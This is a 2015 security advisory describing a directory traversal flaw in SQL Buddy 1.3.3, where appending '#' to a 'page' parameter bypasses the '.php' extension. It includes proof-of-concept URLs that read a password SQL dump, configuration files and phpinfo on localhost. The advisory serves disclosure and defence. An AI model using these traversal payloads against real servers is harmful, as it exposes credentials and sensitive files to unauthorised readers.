Read arbitrary server files due to path and file extension subversion:

Affected Vendor:
www.sqlbuddy.com

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt

Product:
sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL administration application.

Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploits:
=======================

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Disclosure Timeline:
==================================

Vendor Notification  N/A
May 9, 2015: Public Disclosure - hyp3rlinx


Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
===============
High


Description:
==========================

Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
                                [+] #page=[somefile]

Affected Area(s):
                                [+] Server directories & sensitive files

===============================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


(hyp3rlinx)